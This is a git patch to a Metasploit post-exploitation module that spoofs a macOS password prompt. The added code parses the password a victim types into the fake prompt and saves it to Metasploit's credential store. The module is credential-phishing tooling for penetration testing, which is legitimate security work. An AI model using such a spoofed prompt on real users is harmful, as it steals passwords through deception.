From 4d2962386ed686b4b97a7621ad46817a5767ea5f Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Tue, 16 Apr 2019 20:44:45 -0400
Subject: [PATCH] save creds from password prompt spoof

---
 modules/post/osx/gather/password_prompt_spoof.rb | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb
index 3ee715a8fd..3cbecaeead 100644
--- a/modules/post/osx/gather/password_prompt_spoof.rb
+++ b/modules/post/osx/gather/password_prompt_spoof.rb
@@ -106,6 +106,19 @@ class MetasploitModule < Msf::Post
       print_good("password file contents: #{password_data}")
       passf = store_loot("password", "text/plain", session, password_data, "passwd.pwd", "OSX Password")
       print_good("Password data stored as loot in: #{passf}")
+      pwd = password_data.split(':', 3)
+      pwd.shift() # date
+      pwd.shift() # username
+      create_credential({
+        workspace_id: myworkspace_id,
+        post_reference_name: self.refname,
+        private_data: pwd,
+        origin_type: :session,
+        session_id: session_db_id,
+        private_type: :password,
+        username: username
+        }
+      )
     else
       print_status("Timeout period expired before credentials were entered!")
     end